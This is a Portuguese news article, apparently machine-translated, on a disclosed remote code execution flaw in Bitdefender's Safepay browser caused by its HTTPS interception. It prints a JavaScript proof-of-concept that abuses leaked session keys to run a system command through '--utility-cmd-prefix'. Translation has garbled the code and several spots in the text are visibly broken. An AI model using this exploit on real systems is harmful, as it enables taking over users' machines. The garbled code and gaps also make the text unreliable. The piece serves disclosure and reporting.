Vladimir Palant, criador do Adblock Plus, () no navegador especializado Safepay baseado no mecanismo Chromium, oferecido como parte do pacote antivírus Bitdefender Total Security 2020 e que visa aumentar a segurança do trabalho do usuário na rede global (por exemplo, isolamento adicional é fornecido ao acessar bancos e sistemas de pagamento). A vulnerabilidade permite que sites abertos no navegador executem código arbitrário no nível do sistema operacional.
A causa do problema é que o antivírus Bitdefender realiza interceptação local do tráfego HTTPS, substituindo o certificado TLS original do site. Um certificado raiz adicional é instalado no sistema do cliente, o que permite ocultar o funcionamento do sistema de inspeção de tráfego utilizado. O antivírus se intromete no tráfego protegido e insere seu próprio código JavaScript em algumas páginas para implementar a função Safe Search e, em caso de problemas com o certificado de conexão segura, substitui a página de erro retornada pela sua própria. Como a nova página de erro é exibida em nome do servidor que está sendo aberto, outras páginas nesse servidor têm acesso total ao conteúdo inserido pelo Bitdefender.
Ao abrir um site controlado por um invasor, esse site pode enviar um XMLHttpRequest e fingir problemas com o certificado HTTPS ao responder, o que levará ao retorno de uma página de erro falsificada pelo Bitdefender. Como a página de erro é aberta no contexto do domínio do invasor, ele pode ler o conteúdo da página falsificada com os parâmetros do Bitdefender. A página fornecida pelo Bitdefender também contém uma chave de sessão que permite usar a API interna do Bitdefender para iniciar uma sessão separada do navegador Safepay, especificando sinalizadores de linha de comando arbitrários e para iniciar qualquer comando do sistema usando o “--utility-cmd-prefix” bandeira. Um exemplo de exploração (param1 e param2 são valores obtidos na página de erro):
var pedido = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Tipo de conteúdo", "aplicativo/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Recordemos que um estudo realizado em 2017 que 24 dos 26 produtos antivírus testados que inspecionam o tráfego HTTPS por meio de falsificação de certificado reduziram o nível geral de segurança de uma conexão HTTPS.
Apenas 11 dos 26 produtos forneciam conjuntos de criptografia atuais. 5 sistemas não verificaram certificados (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Os produtos Kaspersky Internet Security e Total Security foram sujeitos a ataques , e produtos AVG, Bitdefender e Bullguard são atacados и . Dr.Web Antivirus 11 permite reverter para cifras de exportação não confiáveis (ataque ).
Fonte: opennet.ru